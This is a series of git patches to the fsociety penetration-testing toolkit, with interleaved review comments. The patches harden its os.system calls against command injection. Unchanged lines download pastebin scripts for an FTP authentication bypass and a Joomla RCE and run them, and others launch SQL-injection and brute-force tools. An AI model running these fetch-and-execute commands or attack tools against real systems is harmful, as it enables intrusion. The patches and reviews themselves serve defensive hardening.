From b34b2678f4c5749ae56e45a8e0493d10b820db27 Mon Sep 17 00:00:00 2001 From: sreekanth Date: Fri, 24 Jul 2020 19:46:34 +0530 Subject: [PATCH 01/10] bug fixes --- fsociety.py | 6 +++--- newfile | 7 +++++++ 2 files changed, 10 insertions(+), 3 deletions(-) create mode 100644 newfile diff --git a/fsociety.py b/fsociety.py index 3486876..09ddcfd 100644 --- a/fsociety.py +++ b/fsociety.py @@ -466,7 +466,7 @@ def install(self): def run(self): clearScr() print(self.nmapLogo) - target = raw_input(self.targetPrompt) + target = raw_input(self.targetPrompt).split(' ')[0] self.menu(target) def menu(self, target): @@ -558,7 +558,7 @@ def __init__(self): self.install() clearScr() print(self.wpscanLogo) - target = raw_input(" Enter a Target: ") + target = raw_input(" Enter a Target: ").split(' ')[0] self.menu(target) def installed(self): @@ -618,7 +618,7 @@ def __init__(self): self.install() clearScr() print(self.CMSmapLogo) - target = raw_input(" Enter a Target: ") + target = raw_input(" Enter a Target: ").split(' ')[0] self.run(target) response = raw_input(continuePrompt) diff --git a/newfile b/newfile new file mode 100644 index 0000000..7531c81 --- /dev/null +++ b/newfile @@ -0,0 +1,7 @@ +# Nmap 7.80 scan initiated Fri Jul 24 19:32:15 2020 as: nmap -sV -oN newfile 127.0.0.1 +Nmap scan report for localhost (127.0.0.1) +Host is up (0.000066s latency). +All 1000 scanned ports on localhost (127.0.0.1) are closed + +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Fri Jul 24 19:32:15 2020 -- 1 IP address (1 host up) scanned in 0.32 seconds From d6e7ffb6f542dae9b7fccdf8d67eac9fcaaa5793 Mon Sep 17 00:00:00 2001 From: sreekanth Date: Fri, 24 Jul 2020 19:50:58 +0530 Subject: [PATCH 02/10] bug fix --- newfile | 7 ------- 1 file changed, 7 deletions(-) delete mode 100644 newfile diff --git a/newfile b/newfile deleted file mode 100644 index 7531c81..0000000 --- a/newfile +++ /dev/null 
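Review bot: Taking `.split(' ')[0]` of the prompt input in `run()` (and in the two `__init__` hunks at -558 and -618) only drops what follows the first space; it does not restrict which characters the kept token may contain, so shell metacharacters such as `;` or `|` written without spaces still reach whatever `self.menu(target)` / `self.run(target)` do with the value. Those bodies are outside the hunks, but other functions in this series format the target into an `os.system` string, so an allowlist is the safer check, e.g. `if not re.match(r'^[A-Za-z0-9._:/-]+$', target): return` (this needs `re` in scope, which the patch does not show). A leading space also makes the first token empty, so `.strip()` should come before the split.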
@@ -1,7 +0,0 @@ -# Nmap 7.80 scan initiated Fri Jul 24 19:32:15 2020 as: nmap -sV -oN newfile 127.0.0.1 -Nmap scan report for localhost (127.0.0.1) -Host is up (0.000066s latency). -All 1000 scanned ports on localhost (127.0.0.1) are closed - -Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . -# Nmap done at Fri Jul 24 19:32:15 2020 -- 1 IP address (1 host up) scanned in 0.32 seconds From 0a12e5667144470c8056f4cd93be93115abe8e25 Mon Sep 17 00:00:00 2001 From: sreekanth Date: Sat, 25 Jul 2020 10:59:51 +0530 Subject: [PATCH 03/10] update bug fix --- fsociety.py | 22 +++++++++++++++++----- 1 file changed, 17 insertions(+), 5 deletions(-) diff --git a/fsociety.py b/fsociety.py index 09ddcfd..a6406a5 100644 --- a/fsociety.py +++ b/fsociety.py @@ -467,7 +467,11 @@ def run(self): clearScr() print(self.nmapLogo) target = raw_input(self.targetPrompt).split(' ')[0] - self.menu(target) + try: + socket.gethostbyname(target) + self.menu(target) + except KeyboardInterrupt: + informationGatheringMenu() def menu(self, target): clearScr() @@ -559,7 +563,11 @@ def __init__(self): clearScr() print(self.wpscanLogo) target = raw_input(" Enter a Target: ").split(' ')[0] - self.menu(target) + try: + socket.gethostbyname(target) + self.menu(target) + except KeyboardInterrupt: + informationGatheringMenu() def installed(self): return (os.path.isdir(self.installDir)) @@ -619,9 +627,13 @@ def __init__(self): clearScr() print(self.CMSmapLogo) target = raw_input(" Enter a Target: ").split(' ')[0] - self.run(target) - response = raw_input(continuePrompt) - + try: + socket.gethostbyname(target) + self.run(target) + response = raw_input(continuePrompt) + except KeyboardInterrupt: + informationGatheringMenu() + def installed(self): return (os.path.isdir(self.installDir)) From 31ce86e5ca95d3c6f17366259257c67f752a9f6f Mon Sep 17 00:00:00 2001 
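Review bot: The new `except KeyboardInterrupt:` around `socket.gethostbyname(target)` in `run()` does not catch what a failed lookup raises, `socket.gaierror`, so an unresolvable target ends the program with a traceback instead of returning to the menu; the hunks at -559 and -619 repeat this. Adding `except socket.error:` with a short message before `informationGatheringMenu()` would make the rejection explicit. An empty target appears to pass the check as well, because the socket module treats an empty host string as the wildcard address, so test `if not target:` first. No hunk adds `import socket`; confirm it is already imported at the top of fsociety.py.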
From: sreekanth Date: Sat, 25 Jul 2020 11:25:26 +0530 Subject: [PATCH 04/10] update fix --- fsociety.py | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/fsociety.py b/fsociety.py index a6406a5..27e877a 100644 --- a/fsociety.py +++ b/fsociety.py @@ -467,8 +467,9 @@ def run(self): clearScr() print(self.nmapLogo) target = raw_input(self.targetPrompt).split(' ')[0] + test_target = target.split('/')[0] try: - socket.gethostbyname(target) + socket.gethostbyname(test_target) self.menu(target) except KeyboardInterrupt: informationGatheringMenu() @@ -563,8 +564,9 @@ def __init__(self): clearScr() print(self.wpscanLogo) target = raw_input(" Enter a Target: ").split(' ')[0] + test_target = target.split('/')[0] try: - socket.gethostbyname(target) + socket.gethostbyname(test_target) self.menu(target) except KeyboardInterrupt: informationGatheringMenu() @@ -627,8 +629,9 @@ def __init__(self): clearScr() print(self.CMSmapLogo) target = raw_input(" Enter a Target: ").split(' ')[0] + test_target = target.split('/')[0] try: - socket.gethostbyname(target) + socket.gethostbyname(test_target) self.run(target) response = raw_input(continuePrompt) except KeyboardInterrupt: From 67cd70b67d3283b7754fa3bac8fc6a86c6d8410a Mon Sep 17 00:00:00 2001 From: sreekanth Date: Sat, 25 Jul 2020 11:51:37 +0530 Subject: [PATCH 05/10] fux updated --- fsociety.py | 27 +++++++++++++++++++++------ 1 file changed, 21 insertions(+), 6 deletions(-) diff --git a/fsociety.py b/fsociety.py index 27e877a..e4a3f07 100644 --- a/fsociety.py +++ b/fsociety.py 
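Review bot: The value that is checked and the value that is used differ in all three hunks: `socket.gethostbyname(test_target)` resolves only the text before the first `/`, while `self.menu(target)` and `self.run(target)` still receive the full string, so everything after the slash is passed on unvalidated. Build the argument from the validated pieces rather than reusing the raw input, for example `host, _, rest = target.partition('/')` followed by a check on both parts. The enclosing methods start and end outside the hunks, so how `target` is consumed cannot be confirmed from here.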
@@ -467,9 +467,14 @@ def run(self): clearScr() print(self.nmapLogo) target = raw_input(self.targetPrompt).split(' ')[0] - test_target = target.split('/')[0] + test_target = target.split('/') try: - socket.gethostbyname(test_target) + socket.gethostbyname(test_target[0]) + if len(test_target) > 1: + try: + int(test_target[1]) + except KeyboardInterrupt: + informationGatheringMenu() self.menu(target) except KeyboardInterrupt: informationGatheringMenu() @@ -564,9 +569,14 @@ def __init__(self): clearScr() print(self.wpscanLogo) target = raw_input(" Enter a Target: ").split(' ')[0] - test_target = target.split('/')[0] + test_target = target.split('/') try: - socket.gethostbyname(test_target) + socket.gethostbyname(test_target[0]) + if len(test_target) > 1: + try: + int(test_target[1]) + except KeyboardInterrupt: + informationGatheringMenu() self.menu(target) except KeyboardInterrupt: informationGatheringMenu() @@ -629,9 +639,14 @@ def __init__(self): clearScr() print(self.CMSmapLogo) target = raw_input(" Enter a Target: ").split(' ')[0] - test_target = target.split('/')[0] + test_target = target.split('/') try: - socket.gethostbyname(test_target) + socket.gethostbyname(test_target[0]) + if len(test_target) > 1: + try: + int(test_target[1]) + except KeyboardInterrupt: + informationGatheringMenu() self.run(target) response = raw_input(continuePrompt) except KeyboardInterrupt: From d8477b3630de1c3edd7489659dcbae4046942d9d Mon Sep 17 00:00:00 2001 From: sreekanth Date: Sat, 25 Jul 2020 22:40:23 +0530 Subject: [PATCH 06/10] fix updates --- fsociety.py | 42 ++++++++++++++++++++++++------------------ 1 file changed, 24 insertions(+), 18 deletions(-) diff --git a/fsociety.py b/fsociety.py index e4a3f07..83c164d 100644 --- a/fsociety.py +++ b/fsociety.py 
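Review bot: `int(test_target[1])` raises `ValueError` on a non-numeric suffix, which the inner `except KeyboardInterrupt:` does not catch, so that handler is dead code and bad input ends in a traceback; the hunks at -564 and -629 repeat it. Only index 1 is inspected, so a target with more than one `/` passes with its later segments unchecked, and the number is not range-checked. A stricter form is `if len(test_target) > 2 or not 0 <= int(test_target[1]) <= 32: raise ValueError(target)` inside the outer `try`, paired with `except (ValueError, socket.error):` returning to the menu. The 0-32 range fits the nmap hunk; in the WPScan and CMSmap hunks the text after `/` is presumably a URL path, which an `int()` check would reject outright.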
@@ -569,14 +569,13 @@ def __init__(self): clearScr() print(self.wpscanLogo) target = raw_input(" Enter a Target: ").split(' ')[0] - test_target = target.split('/') + test_target = '' + if target[0:4] == 'http': + test_target = target + else: + test_target = 'http://'+target try: - socket.gethostbyname(test_target[0]) - if len(test_target) > 1: - try: - int(test_target[1]) - except KeyboardInterrupt: - informationGatheringMenu() + urllib2.urlopen(test_target) self.menu(target) except KeyboardInterrupt: informationGatheringMenu() @@ -639,14 +638,13 @@ def __init__(self): clearScr() print(self.CMSmapLogo) target = raw_input(" Enter a Target: ").split(' ')[0] - test_target = target.split('/') + test_target = '' + if target[0:4] == 'http': + test_target = target + else: + test_target = 'http://'+target try: - socket.gethostbyname(test_target[0]) - if len(test_target) > 1: - try: - int(test_target[1]) - except KeyboardInterrupt: - informationGatheringMenu() + urllib2.urlopen(test_target) self.run(target) response = raw_input(continuePrompt) except KeyboardInterrupt: @@ -716,9 +714,18 @@ def __init__(self): self.install() clearScr() print(self.doorkLogo) - target = raw_input(" Enter a Target: ") - self.run(target) - response = raw_input(continuePrompt) + target = raw_input(" Enter a Target: ").split(' ')[0] + test_target = '' + if target[0:4] == 'http': + test_target = target + else: + test_target = 'http://'+target + try: + urllib2.urlopen(test_target) + self.run(target) + response = raw_input(continuePrompt) + except KeyboardInterrupt: + informationGatheringMenu() def installed(self): return (os.path.isdir(self.installDir)) @@ -1103,7 +1110,6 @@ def bsqlbf(): os.system("perl bsqlbf.pl -url %s" % cbsq) os.system("rm bsqlbf.pl") - def atscan(): print ("Do You To Install ATSCAN ?") if yesOrNo(): From ba18e08fb560e67a6d8c17a0a9572ae9b86c4c0e Mon Sep 17 00:00:00 2001 
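Review bot: The scheme test `target[0:4] == 'http'` in the three `__init__` hunks matches any input that merely starts with those four letters, so a bare hostname beginning with "http" gets no scheme added and is treated as if it were already a full URL; `target.startswith(('http://', 'https://'))` states the intent exactly. `urllib2.urlopen(test_target)` is used only as a validity probe, yet it sends a real request to the target with no timeout, and the `URLError` / `HTTPError` it raises for an unreachable host or an error status is not handled by `except KeyboardInterrupt:`. The pre-initialisation `test_target = ''` is redundant, since both branches assign it.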
From: sreekanth Date: Sun, 26 Jul 2020 12:54:59 +0530 Subject: [PATCH 07/10] all fixes --- fsociety.py | 100 +++++++++++++++++++++++++++++++++++++--------------- 1 file changed, 71 insertions(+), 29 deletions(-) diff --git a/fsociety.py b/fsociety.py index 83c164d..d5f4715 100644 --- a/fsociety.py +++ b/fsociety.py @@ -575,7 +575,9 @@ def __init__(self): else: test_target = 'http://'+target try: - urllib2.urlopen(test_target) + url = urlparse(test_target) + socket.gethostbyname(url.netloc) + target = url.scheme + '://' + url.netloc + url.path self.menu(target) except KeyboardInterrupt: informationGatheringMenu() @@ -644,7 +646,9 @@ def __init__(self): else: test_target = 'http://'+target try: - urllib2.urlopen(test_target) + url = urlparse(test_target) + socket.gethostbyname(url.netloc) + target = url.scheme + '://' + url.netloc + url.path self.run(target) response = raw_input(continuePrompt) except KeyboardInterrupt: @@ -721,7 +725,9 @@ def __init__(self): else: test_target = 'http://'+target try: - urllib2.urlopen(test_target) + url = urlparse(test_target) + socket.gethostbyname(url.netloc) + target = url.scheme + '://' + url.netloc + url.path self.run(target) response = raw_input(continuePrompt) except KeyboardInterrupt: @@ -736,8 +742,6 @@ def install(self): os.system("pip install beautifulsoup4 requests Django==1.11") def run(self, target): - if not "http://" in target: - target = "http://" + target logPath = "logs/doork-" + \ strftime("%Y-%m-%d_%H:%M:%S", gmtime()) + ".txt" try: @@ -1036,8 +1040,12 @@ def install(self): os.system("cd %s && chmod +x install.sh && ./install.sh" % self.installDir) def run(self): - target = raw_input("Enter Target IP: ") - os.system("brutex %s" % target) + target = raw_input("Enter Target IP: ").split(' ')[0] + try: + socket.gethostbyname(target) + os.system("brutex %s" % target) + except KeyboardInterrupt: + fsociety() class arachni: 
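Review bot: `socket.gethostbyname(url.netloc)` in the hunks at -575, -644 and -721 (and again in arachni's `run()` in PATCH 09) resolves the whole network-location field, which still carries any `user@` prefix and `:port` suffix, so a URL with an explicit port fails the lookup; `url.hostname` is the attribute that holds only the host. `url.path` is appended to the rebuilt `target` without any check, so the path part of the input is as unconstrained as before, and a query string is dropped silently. `urlparse` is called as a bare name but no hunk adds `from urlparse import urlparse`; confirm the import exists.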
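Review bot: In `brutex.run()` the lookup guards `os.system("brutex %s" % target)`, but the shell still parses the formatted string, so the protection in effect depends on name resolution rejecting unusual input; passing an argument list removes the shell from the picture, `subprocess.call(['brutex', target])` (needs `import subprocess`, which the patch does not show). A failed lookup raises `socket.gaierror`, which `except KeyboardInterrupt:` does not handle. The same pattern is added to `arachni.run()` at -1061 and to `cmsfew()` at -1347; for arachni the `2>` redirect would become a `stderr=` file argument.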
@@ -1061,9 +1069,13 @@ def install(self): "gem install bundler && bundle install --without prof && rake install") def run(self): - target = raw_input("Enter Target Hostname: ") - os.system("arachni %s --output-debug 2> %sarachni/%s.log" % - (target, logDir, strftime("%Y-%m-%d_%H:%M:%S", gmtime()))) + target = raw_input("Enter Target Hostname: ").split(' ')[0] + try: + socket.gethostbyname(target) + os.system("arachni %s --output-debug 2> %sarachni/%s.log" % + (target, logDir, strftime("%Y-%m-%d_%H:%M:%S", gmtime()))) + except KeyboardInterrupt: + fsociety() # Updated to Here @@ -1081,9 +1093,18 @@ def gabriel(): print("Abusing authentication bypass of Open&Compact (Gabriel's)") os.system("wget http://pastebin.com/raw/Szg20yUh --output-document=gabriel.py") clearScr() + common_commands = ['get','put','list','GET','PUT','LIST'] os.system("python gabriel.py") - ftpbypass = raw_input("Enter Target IP and Use Command:") - os.system("python gabriel.py %s" % ftpbypass) + ftpbypass = raw_input("Enter Target IP and Use Command:").split(' ') + try: + socket.gethostbyname(ftpbypass[0]) + if ftpbypass[1] in common_commands: + os.system("python gabriel.py %s %s" % (ftpbypass[0],ftpbypass[1])) + else: + print 'Command Error!!. Please check the Use command.' + fsociety() + except KeyboardInterrupt: + fsociety() def sitechecker(): 
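Review bot: `ftpbypass[1]` in `gabriel()` raises `IndexError` when the user enters only an address, and nothing in the `try` catches it; check the length first, `if len(ftpbypass) < 2 or ftpbypass[1] not in common_commands:`. Splitting with `.split()` rather than `.split(' ')` would also keep repeated spaces from producing empty tokens. The allowlist for the command word is the right approach; the address is still validated only by `socket.gethostbyname`, whose `socket.gaierror` is not handled by `except KeyboardInterrupt:`. The added `print '...'` statement is Python 2-only syntax while the surrounding lines call `print(...)`.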
@@ -1105,10 +1126,19 @@ def ifinurl(): def bsqlbf(): clearScr() print("This tool will only work on blind sql injection") - cbsq = raw_input("select target: ") - os.system("wget https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/bsqlbf-v2/bsqlbf-v2-7.pl -o bsqlbf.pl") - os.system("perl bsqlbf.pl -url %s" % cbsq) - os.system("rm bsqlbf.pl") + cbsq = raw_input("select target: ").split(' ')[0] + test_target = urlparse(cbsq) + try: + socket.gethostbyname(test_target.netloc) + if test_target.scheme != '': + cbsq = test_target.scheme + '://' + test_target.netloc + test_target.path + else: + cbsq = test_target.netloc + test_target.path + os.system("wget https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/bsqlbf-v2/bsqlbf-v2-7.pl -o bsqlbf.pl") + os.system("perl bsqlbf.pl -url %s" % cbsq) + os.system("rm bsqlbf.pl") + except KeyboardInterrupt: + fsociety() def atscan(): print ("Do You To Install ATSCAN ?") @@ -1142,9 +1172,12 @@ def joomlarce(): os.system("wget http://pastebin.com/raw/EX7Gcbxk --output-document=temp.py") clearScr() print("if the response is 200 , you will find your shell in Joomla_3.5_Shell.txt") - jmtarget = raw_input("Select a targets list:") - os.system("python temp.py %s" % jmtarget) - + jmtarget = raw_input("Select a targets list:").split(' ')[0] + try: + os.path.exists(jmtarget) + os.system("python temp.py %s" % jmtarget) + except KeyboardInterrupt: + fsociety() def inurl(): dork = raw_input("select a Dork:") 
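Review bot: In `bsqlbf()` the input goes to `urlparse(cbsq)` without a scheme being added first, so for scheme-less input `netloc` is empty and the whole string lands in `path`; `socket.gethostbyname('')` then appears to succeed (an empty host is treated as the wildcard address) and the unvalidated `path` is formatted into `os.system("perl bsqlbf.pl -url %s" % cbsq)`. Reject input that has no host before going further, e.g. `if not test_target.hostname: print("Invalid URL"); return`, and quote the value with `pipes.quote(cbsq)` or pass an argument list to `subprocess.call`. Neither `pipes` nor `subprocess` is shown as imported in this patch.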
@@ -1347,20 +1380,29 @@ def shellnoob(): def androidhash(): - key = raw_input("Enter the android hash: ") - salt = raw_input("Enter the android salt: ") - os.system( - "git clone --depth=1 https://github.com/PentesterES/AndroidPINCrack.git") - os.system( - "cd AndroidPINCrack && python AndroidPINCrack.py -H %s -s %s" % (key, salt)) + key = raw_input("Enter the android hash: ").split(' ')[0] + salt = raw_input("Enter the android salt: ").split(' ')[0] + symbols = ['!','@','#','$','%','^','&','*','(',')','-','=','+','|','||','&&','/','//','+'] + if symbols not in key and symbols not in salt: + os.system( + "git clone --depth=1 https://github.com/PentesterES/AndroidPINCrack.git") + os.system( + "cd AndroidPINCrack && python AndroidPINCrack.py -H %s -s %s" % (key, salt)) + else: + print 'Hash or Slat Error. Please check the hash and salt.' + fsociety() def cmsfew(): print("your target must be Joomla, Mambo, PHP-Nuke, and XOOPS Only ") - target = raw_input("Select a target: ") - os.system( - "wget https://dl.packetstormsecurity.net/UNIX/scanners/cms_few.py.txt -O cms.py") - os.system("python cms.py %s" % target) + target = raw_input("Select a target: ").split(' ')[0] + try: + socket.gethostbyname(target) + os.system( + "wget https://dl.packetstormsecurity.net/UNIX/scanners/cms_few.py.txt -O cms.py") + os.system("python cms.py %s" % target) + except KeyboardInterrupt: + fsociety() def smtpsend(): From 9d28d77055d9e759f594f156df26f60ab0370e92 Mon Sep 17 00:00:00 2001 From: sreekanth Date: Sun, 26 Jul 2020 13:19:22 +0530 Subject: [PATCH 08/10] all fixes --- fsociety.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/fsociety.py b/fsociety.py index d5f4715..cfc8a4c 100644 --- a/fsociety.py +++ b/fsociety.py 
@@ -1174,8 +1174,8 @@ def joomlarce(): print("if the response is 200 , you will find your shell in Joomla_3.5_Shell.txt") jmtarget = raw_input("Select a targets list:").split(' ')[0] try: - os.path.exists(jmtarget) - os.system("python temp.py %s" % jmtarget) + if os.path.exists(jmtarget): + os.system("python temp.py %s" % jmtarget) except KeyboardInterrupt: fsociety() From c760f9eb1f19ef5c82205104d50d8d0a8bc00ae5 Mon Sep 17 00:00:00 2001 From: sreekanth Date: Sun, 26 Jul 2020 21:55:09 +0530 Subject: [PATCH 09/10] update all fixes --- fsociety.py | 23 ++++++++++++++++------- 1 file changed, 16 insertions(+), 7 deletions(-) diff --git a/fsociety.py b/fsociety.py index cfc8a4c..989445d 100644 --- a/fsociety.py +++ b/fsociety.py @@ -1070,8 +1070,15 @@ def install(self): def run(self): target = raw_input("Enter Target Hostname: ").split(' ')[0] + test_target = '' + if target[0:4] == 'http': + test_target = target + else: + test_target = 'http://'+target try: - socket.gethostbyname(target) + url = urlparse(test_target) + socket.gethostbyname(url.netloc) + target = url.scheme + '://' + url.netloc + url.path os.system("arachni %s --output-debug 2> %sarachni/%s.log" % (target, logDir, strftime("%Y-%m-%d_%H:%M:%S", gmtime()))) except KeyboardInterrupt: 
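Review bot: `os.path.exists(jmtarget)` in `joomlarce()` confirms that the path exists but says nothing about its characters, and a file name may legally contain characters the shell interprets, so `os.system("python temp.py %s" % jmtarget)` should either quote the value or become `subprocess.call(['python', 'temp.py', jmtarget])`. When the file is missing the function now returns silently; an `else:` branch that prints a message would tell the user why nothing ran. `os.path.isfile` is the closer test, since a directory also satisfies `exists`.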
@@ -1181,10 +1188,12 @@ def joomlarce(): def inurl(): dork = raw_input("select a Dork:") - output = raw_input("select a file to save:") - os.system( - "./inurlbr.php --dork '{0}' -s {1}.txt -q 1,6 -t 1".format(dork, output)) - webHackingMenu.completed("InurlBR") + output = raw_input("select a file to save:").split(' ')[0] + all_dorks = ['dork:', 'dork-file:', 'exploit-cad:', 'range:', 'range-rand:', 'irc:', 'exploit-all-id:', 'exploit-vul-id:', 'exploit-get:', 'exploit-post:', 'regexp-filter:', 'exploit-command:', 'command-all:', 'command-vul:', 'replace:', 'remove:', 'regexp:', 'sall:', 'sub-file:', 'sub-get::', 'sub-concat:', 'user-agent:', 'url-reference:', 'delay:', 'sendmail:', 'time-out:', 'http-header:', 'ifcode:', 'ifurl:', 'ifemail:', 'mp:', 'target:', 'no-banner::', 'gc::', 'proxy:', 'proxy-file:', 'time-proxy:', 'pr::', 'proxy-http-file:', 'update::', 'info::', 'help::', 'unique::', 'popup::', 'ajuda::', 'install-dependence::', 'cms-check::', 'sub-post::', 'robots::', 'alexa-rank::', 'beep::', 'exploit-list::', 'tor-random::', 'shellshock::', 'dork-rand:', 'sub-cmd-all:', 'sub-cmd-vul:', 'port-cmd:', 'port-scan:', 'port-write:', 'ifredirect:', 'persist:', 'file-cookie:', 'save-as:'] + if dork in all_dorks: + os.system( + "./inurlbr.php --dork '{0}' -s {1}.txt -q 1,6 -t 1".format(dork, output)) + webHackingMenu.completed("InurlBR") def insinurl(): @@ -1382,8 +1391,8 @@ def shellnoob(): def androidhash(): key = raw_input("Enter the android hash: ").split(' ')[0] salt = raw_input("Enter the android salt: ").split(' ')[0] - symbols = ['!','@','#','$','%','^','&','*','(',')','-','=','+','|','||','&&','/','//','+'] - if symbols not in key and symbols not in salt: + symbols = ['!','@','#','$','%','^','&','*','(',')','-','=','+','|','||','&&','/','//','+', ' '] + if [symbol for symbol in symbols if symbol not in key and symbol not in salt] == symbols: os.system( "git clone --depth=1 https://github.com/PentesterES/AndroidPINCrack.git") os.system( 
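Review bot: `if dork in all_dorks:` in `inurl()` compares the entered dork with what look like inurlbr's option names (the entries carry getopt-style `:` suffixes) rather than with dork values, so an ordinary search dork fails the test and the function returns without any message. `output` is still formatted unquoted into `-s {1}.txt`, and `dork` sits inside single quotes that a quote character in the input would close; `pipes.quote()` on both values, or an argument list, handles this without a lookup table. PATCH 10 adds `.split(' ')[0]` to `dork`, which would cut a multi-word dork at the first space.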
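Review bot: The rewritten test in `androidhash()` is a denylist, and several characters the shell treats specially (`;` and the backquote, for instance) are not on it, so `key` and `salt` are not fully constrained before they reach the `os.system` call further down. An allowlist is shorter and complete: `if key.isalnum() and salt.isalnum():`, assuming the hash is hexadecimal and the salt numeric as the prompts suggest; it also rejects empty input. The list-comprehension comparison is hard to read, and `'+'` appears twice in `symbols`.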
From 00505d6c93cfdc95359e7285db46722996e3de9e Mon Sep 17 00:00:00 2001 From: sreekanth Date: Sun, 26 Jul 2020 22:01:22 +0530 Subject: [PATCH 10/10] update all fixes --- fsociety.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/fsociety.py b/fsociety.py index 989445d..0f468c2 100644 --- a/fsociety.py +++ b/fsociety.py @@ -1187,7 +1187,7 @@ def joomlarce(): fsociety() def inurl(): - dork = raw_input("select a Dork:") + dork = raw_input("select a Dork:").split(' ')[0] output = raw_input("select a file to save:").split(' ')[0] all_dorks = ['dork:', 'dork-file:', 'exploit-cad:', 'range:', 'range-rand:', 'irc:', 'exploit-all-id:', 'exploit-vul-id:', 'exploit-get:', 'exploit-post:', 'regexp-filter:', 'exploit-command:', 'command-all:', 'command-vul:', 'replace:', 'remove:', 'regexp:', 'sall:', 'sub-file:', 'sub-get::', 'sub-concat:', 'user-agent:', 'url-reference:', 'delay:', 'sendmail:', 'time-out:', 'http-header:', 'ifcode:', 'ifurl:', 'ifemail:', 'mp:', 'target:', 'no-banner::', 'gc::', 'proxy:', 'proxy-file:', 'time-proxy:', 'pr::', 'proxy-http-file:', 'update::', 'info::', 'help::', 'unique::', 'popup::', 'ajuda::', 'install-dependence::', 'cms-check::', 'sub-post::', 'robots::', 'alexa-rank::', 'beep::', 'exploit-list::', 'tor-random::', 'shellshock::', 'dork-rand:', 'sub-cmd-all:', 'sub-cmd-vul:', 'port-cmd:', 'port-scan:', 'port-write:', 'ifredirect:', 'persist:', 'file-cookie:', 'save-as:'] if dork in all_dorks: